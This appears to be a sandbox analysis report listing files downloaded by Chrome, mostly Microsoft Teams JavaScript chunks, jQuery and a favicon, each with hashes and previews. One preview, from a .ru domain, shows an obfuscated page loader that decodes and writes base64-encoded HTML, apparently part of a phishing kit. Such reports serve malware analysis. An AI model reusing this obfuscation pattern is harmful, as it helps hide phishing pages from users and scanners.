                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[834680,795423,390601,472903,173388,951007],{414214:(e,t,r)=>{r.d(t,{M:()=>o});var o=function(e){return{attributes:{dismissAction:{"aria-describedby":e.bodyId}}}}},182227:(e,t,r)=>{r.d(t,{K:()=>o});var o=function(){return{attributes:{root:{role:"img","aria-hidden":"true"}}}}},498255:(e,t,r)=>{r.d(t,{K:()=>a});var o=r(953543),n=r(504405),a=function(e){var t;return{attributes:{root:(t={"aria-checked":"mixed"===e.checked?"mixed":!!e.checked,"aria-disabled":e.disabled,role:"checkbox",tabIndex:0},t[n.P]=!0,t)},keyActions:{root:{performClick:{keyCombinations:[{keyCode:o.ZG}]}}}}}},244211:(e,t,r)=>{r.d(t,{K:()=>c});var o=r(55543),n=r.n(o),a=r(76424),s=r.n(a),l=r(953543),i=r(928879),c=function(e){var t=(0,i.Z)(Object.assign({},e,{inline:!e.contextMenu}));return s()(t,{attributes:{trigger:Object.assign({},e.open&&{"aria-controls":e.menuId},e.open&&!e.contextMenu&&{"aria-expanded":"true
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):82543
                                                                                                                                                                                                                          Entropy (8bit):4.439588799496337
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:SjnIJEJER5S3E4QgcTvuydQDnDGCNxYYLvNbaUxV5fFWlpVvgIakl22arkiDluGA:SQEJERwJ6Q5ZDpFW/R8wBrtIPyoYjAM
                                                                                                                                                                                                                          MD5:E4EDA3353C02D83B0BAE1EA3F184DED6
                                                                                                                                                                                                                          SHA1:50DF4C1C65D6B4D6CB6B1E84BBEEB342AE70EABD
                                                                                                                                                                                                                          SHA-256:5DF8F1277C43DF55DBC88568A594E271C3956084AA2F0C2CFFD84C34E2F6A4AF
                                                                                                                                                                                                                          SHA-512:87058927EBD1CBBD7BA777AF33405169C1C558285E5137773BBE82E322049D3B171A4F303DA009A0568C5660C9FE39A06F35497CE0E1555933B4C3BCC532E6EC
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/169233-94071e9ab8bbe183.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[169233],{169233:(a,l,h)=>{h.d(l,{ZtX:()=>c,vXm:()=>v,on3:()=>e,m61:()=>m,Yfv:()=>A,wbC:()=>M,l1P:()=>r,dcr:()=>H,$Vp:()=>V,tX_:()=>U,K4k:()=>i,gNM:()=>d,C$A:()=>C,QUO:()=>L,FV:()=>R,Jkc:()=>o,qw7:()=>t,eAs:()=>u,Co4:()=>n,ETz:()=>g,xyh:()=>F,BjN:()=>w,f9S:()=>p,Rl_:()=>s,tXH:()=>f,JAW:()=>k,dIR:()=>B,XST:()=>S,lOY:()=>I,Tu1:()=>E,mho:()=>b,g0A:()=>D,PCP:()=>_,hyw:()=>y,qTc:()=>T,cUx:()=>x,ryW:()=>X,lkJ:()=>z,cDX:()=>G,M5p:()=>O,__C:()=>Q,muQ:()=>q,SEp:()=>j,Yx5:()=>J,IEM:()=>P,SZX:()=>Y,abA:()=>W,mdF:()=>N,_tw:()=>K,a1m:()=>$,LI8:()=>aa,Tp5:()=>la,fXC:()=>ha,ZRs:()=>Za,nQe:()=>ca,l_X:()=>va,SGl:()=>ea,MZl:()=>ma,up$:()=>Aa,IM1:()=>Ma,iju:()=>ra,uEE:()=>Ha,a2s:()=>Va,Yi9:()=>Ua,iBC:()=>ia,GN6:()=>da,UEN:()=>Ca,Tdu:()=>La,Rvv:()=>Ra,Sub:()=>oa,qqS:()=>ta,ZJF:()=>ua,nn9:()=>na,W9G:()=>ga,Um6:()=>Fa,oYc:()=>wa,O35:()=>pa,PDr:()=>sa,P0w:()=>fa,r$t:()=>ka,JdG:()=>Ba,xKI:()=>Sa,rCW:
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):412
                                                                                                                                                                                                                          Entropy (8bit):5.483625893120041
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6:fZOoPOrKGI5YDHm/IrzqeCnTNKl/vtAgWjEPltls+4JeSEHj+iq0q5/jygP+k4q9:ESOXI5YjIE4E9tA0Pb3SkEl9q
                                                                                                                                                                                                                          MD5:5DD6CE63F6AB4419F6389A4E20642497
                                                                                                                                                                                                                          SHA1:DC60AD2AABCE1D57CA8A1A9968023EE38394936F
                                                                                                                                                                                                                          SHA-256:5B9215247EEFA1AA3E7233BDA8C3144F99CFEB5C2A8A2053DA7A59ACCCDEE501
                                                                                                                                                                                                                          SHA-512:983256A81344F03F3B1C921D720ED00C4BF0A93510E9DB868F490A703C4BD14E53649E741EA0C0211D0AC97C81CE81403B0B1FFDEF8AA3EA5F694D38A1C3446B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:"https://img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/favicon/909c1b4d-c97b-4914-b7e0-f39ba802c054/b773b1db-e964-4dd6-8fed-45fbfd73ffc5.png/:/rs=w:48,h:48,m"
                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8X..............VP8 .........*....>i*.E.".....@....X.i.... .,.$.h..=..*........F....:.......kH.7.S9.G.[-..........7.....q.............;...g.r../..6.c.(.......w...Zif.%{P{.P.......U.....N.N.pE...^.X.EXIF....Exif..II*...........................V...........^...(.......................i.......f.......8c......8c................0210....................0100........................................
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (18459)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):18567
                                                                                                                                                                                                                          Entropy (8bit):5.392203233495941
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:LAi3uZJIFAgk156FIFhmIJnHBxXX82oXR:LV3uaTktBBZWR
                                                                                                                                                                                                                          MD5:F1E2E125B6A655A912A2732F8DD84774
                                                                                                                                                                                                                          SHA1:19F8C0FC642A97EDD95E7A4623CF81221E2DFDA1
                                                                                                                                                                                                                          SHA-256:F3AE7ECE0106D467F5664C8865AF069E73CBB617BDEC69AE925DF65C516C3E7F
                                                                                                                                                                                                                          SHA-512:92ECB71EC56F834B32B49DC3B45CFF1E5345C32C7919B0BB6B602A55B62B1E5A2669F13CF220233B29A2E646D2CC0E1E85237542ECA3DF01CA03C5148C725C40
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/196395-04975d44a0a148a8.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[196395],{692934:(e,n,t)=>{t.d(n,{J4:()=>c,Dl:()=>h,On:()=>m,As:()=>C,Fd:()=>s,L2:()=>p,Oi:()=>v,oU:()=>d,ge:()=>f,wI:()=>I,PX:()=>w,X4:()=>l,kL:()=>g,qP:()=>u});var a=t(938510),r="locale",i="ver",o="name",s=(0,a.o)({UserExt:[0,"user"],DeviceExt:[1,"device"],TraceExt:[2,"trace"],WebExt:[3,"web"],AppExt:[4,"app"],OSExt:[5,"os"],SdkExt:[6,"sdk"],IntWebExt:[7,"intweb"],UtcExt:[8,"utc"],LocExt:[9,"loc"],CloudExt:[10,"cloud"],DtExt:[11,"dt"]}),c=(0,a.o)({id:[0,"id"],ver:[1,i],appName:[2,o],locale:[3,r],expId:[4,"expId"],env:[5,"env"]}),u=(0,a.o)({domain:[0,"domain"],browser:[1,"browser"],browserVer:[2,"browserVer"],screenRes:[3,"screenRes"],userConsent:[4,"userConsent"],consentDetails:[5,"consentDetails"]}),l=(0,a.o)({locale:[0,r],localId:[1,"localId"],id:[2,"id"]}),d=(0,a.o)({osName:[0,o],ver:[1,i]}),f=(0,a.o)({ver:[0,i],seq:[1,"seq"],installId:[2,"installId"],epoch:[3,"epoch"]}),
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (35485)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):35593
                                                                                                                                                                                                                          Entropy (8bit):5.433201153959229
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:BUd8hDG5Tf4TCvJIuyxof+JuJAXNh4ptwBKPQ7KcnwCVJp8FsnxMhRnA:KdgO0LXy+JuJAXNKp6BKPQJnwCRNxMha
                                                                                                                                                                                                                          MD5:614CEF6A5591243EE327D5D2B7A2C698
                                                                                                                                                                                                                          SHA1:A30288FE3D15BFEDC3E3B73B18A2ADA72BD43ABB
                                                                                                                                                                                                                          SHA-256:8D81DC89757CB48425F7781F7FB889913FD959E96F977CA03F2BF19C571D9B72
                                                                                                                                                                                                                          SHA-512:A37C171BE9894AA1EEA99374626498E734F9D3A632FEEB41E308D6D2142FBBB99CE48B101F29EA87FD7C736BC4300686371C755D56A828BCED9C5013B7CA0F1D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[972276],{296920:(e,t,n)=>{n.d(t,{e:()=>y,y:()=>I});var i=n(689054),r=n(305573);function s(e,t){for(var n,i=/\r\n|[\n\r]/g,r=1,s=t+1;(n=i.exec(e.body))&&n.index<t;)r+=1,s=t+1-(n.index+n[0].length);return{line:r,column:s}}function a(e){return o(e.source,s(e.source,e.start))}function o(e,t){var n=e.locationOffset.column-1,i=u(n)+e.body,r=t.line-1,s=e.locationOffset.line-1,a=t.line+s,o=1===t.line?n:0,l=t.column+o,p="".concat(e.name,":").concat(a,":").concat(l,"\n"),h=i.split(/\r\n|[\n\r]/g),f=h[r];if(f.length>120){for(var d=Math.floor(l/80),E=l%80,v=[],N=0;N<f.length;N+=80)v.push(f.slice(N,N+80));return p+c([["".concat(a),v[0]]].concat(v.slice(1,d+1).map((function(e){return["",e]})),[[" ",u(E-1)+"^"],["",v[d+1]]]))}return p+c([["".concat(a-1),h[r-1]],["".concat(a),f],["",u(l-1)+"^"],["".concat(a+1),h[r+1]]])}function c(e){var t=e.filter((function(e){e[0];return void 0!==e[1]})),n
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):89501
                                                                                                                                                                                                                          Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (7509), with CRLF line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):19782
                                                                                                                                                                                                                          Entropy (8bit):5.880573391023805
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:S+snumF1HqHDVvomnRnumF1HqHDVvXlr9lrf:D+ViAmnrVivlr9lrf
                                                                                                                                                                                                                          MD5:F005FB8F1BEF1B6177D979DED215FF42
                                                                                                                                                                                                                          SHA1:6B55E373B9E20F58412CA048F4688AA413BA9890
                                                                                                                                                                                                                          SHA-256:8DE70280B3ED56B3524095A761139ED411A84C5D1F8CA7B8CBFDA49718259B66
                                                                                                                                                                                                                          SHA-512:E1F680B7A26FE6F3B48977EBADE40C43EEF0DBE6F3946FB30B6EA39EE12FB3455C3830DBD78E890FAD0DC4899A7A01DE4B5FDB7A60A33DB52EA71B8BEB7AAA39
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://vexino.mactans.ru/21EzuOJ/
                                                                                                                                                                                                                          Preview: The way to get started is to quit talking and begin doing. -->..<script>....if(atob("aHR0cHM6Ly92ZXhpbm8ubWFjdGFucy5ydS8yMUV6dU9KLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdo
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (44430)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):44538
                                                                                                                                                                                                                          Entropy (8bit):5.447081494250054
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:P42u5mtBtjEehBi7fLl65p6IGnmNhR7QnByQOzwjWjXVx3KTvmU20DnzxH2R4kJI:P+At4mi/ySnCZQup0hy5V8WdCtNJwwIC
                                                                                                                                                                                                                          MD5:276C68721ADA14C261592309DE5E89FF
                                                                                                                                                                                                                          SHA1:D8937600043FE114484C25C74F55FB6F011BE4EB
                                                                                                                                                                                                                          SHA-256:AB49D588961EB600B87818670049237EB512024C57D9459724E1D089DB07AFAE
                                                                                                                                                                                                                          SHA-512:9B663944E60E27D5998CCD41175FCB8AB7B565FCEF2FE13B247C8BB749EEA3CA351B7948A7CFF0C9072CE55D28581B4FD843019B502040778D4222108F52B397
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/950449-d8aed37fd787097c.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[950449],{466563:(e,t,a)=>{a.d(t,{Xp:()=>i,AX:()=>o,q0:()=>r,WD:()=>s});var n=a(942016);function i(e,t){return{entity:{type:n.ck.chats,action:n.SY.create,id:o(e)},command:t}}function o(e){return JSON.stringify(e&&e.length>0?e.sort():[])}function r(e,t,a,n){let i={};if(!e)return i;if(e.type===t&&e.action===a){const t=e.options;if(t&&"string"==typeof t)try{i=JSON.parse(t)}catch{n.warn(`Entity options are in unexpected format. Expected a valid stringified JSON object but instead received: ${String(t)}.`)}}else n.warn(`Entity options are (incorrectly) being asked for type and action that do not pertain to the entity. ${String(e.type)} != ${String(t)} or ${String(e.action)} != ${String(a)}`);return i}const s=e=>`${e.substring(0,32)}00000000${e.substring(40)}`},403376:(e,t,a)=>{a.d(t,{r:()=>i});var n=a(362328);const i={kind:"Document",get definitions(){const e=(0,n.G)("query message
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (32173)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):32281
                                                                                                                                                                                                                          Entropy (8bit):5.623211319817814
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:ky1r565y2Dg/3BsGZa+FOZSQ4dkSPNmsMqYy:kir56I2qZxOZ94dkSFYy
                                                                                                                                                                                                                          MD5:7DF8076203955E41A3A1DAAF66AF32F4
                                                                                                                                                                                                                          SHA1:DA4EE21BE5530F03B5ABAF6340D46306AD1D2D82
                                                                                                                                                                                                                          SHA-256:49F636559DA44780ABE2D07DF84DDB68B7A0D35228ABB6F01F8F6E4646C330CE
                                                                                                                                                                                                                          SHA-512:EC4165C1A1C0B99E2385401C4F8BF044F1AADFE6CD7F00C63C9FDB19DECCF22B9D7CB315DBB226E0D34C7AB03173380D454A310D106A8E14B020258D15E8C98F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/675783-0d429e991ff3f034.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[675783],{554404:(e,n,t)=>{var i,a,o,s,E,r,S,_,T,l,I,A,c,C,R,p,N,m,d,u,L;t.d(n,{qv:()=>i,SY:()=>a,Kt:()=>o,VA:()=>E,lM:()=>r,Pr:()=>S,Kv:()=>_,To:()=>T,PY:()=>l,bh:()=>I,D2:()=>A,np:()=>C,zD:()=>R,pU:()=>p,s4:()=>N,d8:()=>m,Cu:()=>d,wy:()=>u}),function(e){e.Work="",e[e.Freemium=2]="Freemium",e[e.Life=3]="Life"}(i||(i={})),function(e){e.Personal="personal",e.Channel="channel",e.Unknown="unknown"}(a||(a={})),function(e){e.GuardianChat="GuardianChat"}(o||(o={})),function(e){e[e.anonymous=0]="anonymous",e[e.default=1]="default",e[e.guest=2]="guest",e[e.msaGuest=3]="msaGuest",e[e.msaMember=4]="msaMember",e[e.otpGuest=5]="otpGuest",e[e.otpMember=6]="otpMember"}(s||(s={})),function(e){e[e.Admin=0]="Admin",e[e.Anonymous=1]="Anonymous",e[e.Guest=2]="Guest",e[e.Regular=3]="Regular"}(E||(E={})),function(e){e.x64="x64",e.ia32="ia32",e.x86="x86",e.unknown="unknown"}(r||(r={})),function(e){
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2740)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):2868
                                                                                                                                                                                                                          Entropy (8bit):5.3902771129703595
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:wp3sp3oixAQmUUyXeECVdTeCVd1goWlailPvxw4svkew1hj1hDhP3haHbeNCBkGy:lFUyOV3vZg8ilPe4s8eq7NZ0HSgkGsIk
                                                                                                                                                                                                                          MD5:31616D909F22DE626E97886039B11BE7
                                                                                                                                                                                                                          SHA1:6F02320366C4BEDB38CD23FB573E1E256EACF1E4
                                                                                                                                                                                                                          SHA-256:32FFDBD5047D20AB0F860EDD0337F92A00D990785892670A39E14A746F7D0A9D
                                                                                                                                                                                                                          SHA-512:57134A8AC5C560C420B4D9D3FB0EE842F924C22DEC0E34F5C62DC0A687973979F85C08B09F763325B7B31AB978EF3D5597ED303D6510F3401E780EA233D8AC61
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/services-sharepoint-client-e22e01c4ca3d9d51.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[439411],{634305:(e,t,r)=>{r.r(t),r.d(t,{SHAREPOINT_SCENARIO_HEADER_FOR_THUMBNAIL_API_PREFIX:()=>R.e,SharePointPreferHeaders:()=>R.Y2,SharepointRestClient:()=>y,SharepointScenario:()=>R.eu,SharepointScenarioType:()=>R.CK,SharepointSharingMode:()=>R.vV,createSimpleRequest:()=>S.K,simpleRequestSender:()=>S.X});var s=r(116259),n=r(90744),a=r(539299),o=r(262775),i=r(364819),c=r(332752),u=r(805809),p=r(424096);const h=(e,t)=>({...e,serviceName:u.p.Sharepoint,headers:t}),d=({authenticationResources:e})=>{const t=$,r=(0,p.e)(t,{});return{serviceName:u.p.Sharepoint,authResource:e.authorizeByUrl,models:{rawRequest:r(h).withTransform(m)}}};function $(e){return Promise.resolve({constructRequest:e,rejectHttpError:!0})}const m=async e=>e,_=(e,t)=>({rawRequest:l(e,t)}),l=(e,t)=>async(r,s)=>{const n=h(r,s);return e(n,t)};class y{constructor(e,t,r,o){this._aad=e,this._clientType=t.config.clie
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (15028)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):15136
                                                                                                                                                                                                                          Entropy (8bit):5.353622533370098
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:+M4Z8nM9h4znlRz1sG0TevRuBL7rJSZYziKCZiM4ND5x6tbeUIEhj:+M4j8zjz1sG0TevgBL7lSZYziZoM4Nby
                                                                                                                                                                                                                          MD5:6079A78034C6177D22105DF67701A845
                                                                                                                                                                                                                          SHA1:BBED8DA8D6A18783CD50DF12F63020D283DCA746
                                                                                                                                                                                                                          SHA-256:30530BB045C4F2C89D9AE2A71977804251E888C737B783DD068630713803A38F
                                                                                                                                                                                                                          SHA-512:C29659B41F17D032BD70086B4D03EA12686B19F430F4656C35E69AAE8604F913C12F093CF3351CBCABF667EAEE580BC096D2FA8346C310398EB4F9AFD8E7FF6E
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/421318-8ae476c777a9a79b.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[421318],{851706:(e,t,n)=>{n.d(t,{E:()=>V});var r=n(513432),o=n(48374),a=n(883027),i=n(602835),l=n(691478),u=n(164093),c=n(716300),s=n(250452),d=n(478304),f=n(31152),v=n(35871),b=n(103735);const m=(0,b.D)("r6pzz3z",null),p=(0,b.D)("r144vlu9",null);var y=n(115170),h=n(123082);const g=[{opacity:0},{opacity:1}],E=(0,y.$)({enter:{keyframes:g,easing:h.TV.curveLinear,duration:h.TV.durationGentle},exit:{keyframes:[...g].reverse(),easing:h.TV.curveLinear,duration:h.TV.durationGentle}});var k=n(712944);const D=(e,t)=>{const n=(0,k.Z)(),b=(0,f.e4)((e=>e.modalType)),y=(0,f.e4)((e=>e.isNestedDialog)),h=(0,f.e4)((e=>e.modalAttributes)),g=(0,f.e4)((e=>e.dialogRef)),D=(0,f.e4)((e=>e.requestOpenChange)),w=(0,f.e4)((e=>e.dialogTitleId)),C=(0,f.e4)((e=>e.open)),L=(0,i.D)((t=>{var n,r;(0,l.g)(e.backdrop)&&(null===(n=(r=e.backdrop).onClick)||void 0===n||n.call(r,t));"modal"!==b||t.isDefaultPreven
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (20845)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):20952
                                                                                                                                                                                                                          Entropy (8bit):5.312655616899363
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:Xvr3TLvGAkYt54AlLR3Rr6yRZvS1RdWspv8CHSIJ+t4l1:XvPrRT+z
                                                                                                                                                                                                                          MD5:0DA43D7DD5D49C8E50684556326AEEA6
                                                                                                                                                                                                                          SHA1:8308F2C481046EE86F6FA114948131B82E841F98
                                                                                                                                                                                                                          SHA-256:BF86140F152FCCF6763F7B46B18E7F78D2FDFD6B18FD6684E741E0104C415F61
                                                                                                                                                                                                                          SHA-512:B8EA54E4C46839E8AB211D4562296C06F7540AE463C33A2F510F6851DED718553F4EF4C2733E2D6572943828439B7AF3EF4A7705D67C071DB1EC2AE60DC477D1
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[94139],{214238:(t,e,r)=>{function n(t,e){if(null==t)throw new TypeError("assign requires that input parameter not be null or undefined");for(var r in e=e||{})Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r]);return t}r.d(e,{A:()=>n})},94139:(t,e,r)=>{r.d(e,{A:()=>ot});var n=r(864627),a=r(798202),i=r(805247),o=r(214238),u=r(489176),s=r(997464),c=r(896825),d=r(650616),l=r(336116),f=r(425179);function w(t,e,r){(0,f.A)(2,arguments);var n=r||{},a=n.locale,o=a&&a.options&&a.options.weekStartsOn,u=null==o?0:(0,d.A)(o),s=null==n.weekStartsOn?u:(0,d.A)(n.weekStartsOn);if(!(s>=0&&s<=6))throw new RangeError("weekStartsOn must be between 0 and 6 inclusively");var c=(0,i.A)(t),l=(0,d.A)(e),w=((l%7+7)%7<s?7:0)+l-c.getUTCDay();return c.setUTCDate(c.getUTCDate()+w),c}var h=r(315391);var m=r(534711);var b=r(510327),T=r(715394),p=/^(1[0-2]|0?\d)/,y=/^(3[0-1]|[0-2]?\d)/,g=/^(36[0-6]|3[0-5]
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (20588)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):20703
                                                                                                                                                                                                                          Entropy (8bit):5.264666815172731
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:xwzYpLlQ4N/aTLwZ8qgA604dlBoI8WcHFufkE+9zWP9+Gv0Y6XoDidUhs8L5skLx:CUVlQ4N/a3wZ8LA604bBoI8vcfN+9yPp
                                                                                                                                                                                                                          MD5:69ECA731C1AAF4A9525E88C0A4F50F9D
                                                                                                                                                                                                                          SHA1:B19B3D104E0BA17A8C9DB9804E68AA1E12583DA8
                                                                                                                                                                                                                          SHA-256:5D6F5EFCC03C21420B1E057DA2C8F1307E88C17BA419DEB68CAC0C639208F031
                                                                                                                                                                                                                          SHA-512:C1663BF699B799D65A419C99101CE4324B68F5FE103BE28F6CDD312D0AC5A65DC6F668423B2C227D9B49075AD63B96897E6D39AC847CD484258334EF159BCA98
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/945920-3a6d5656b464115b.js
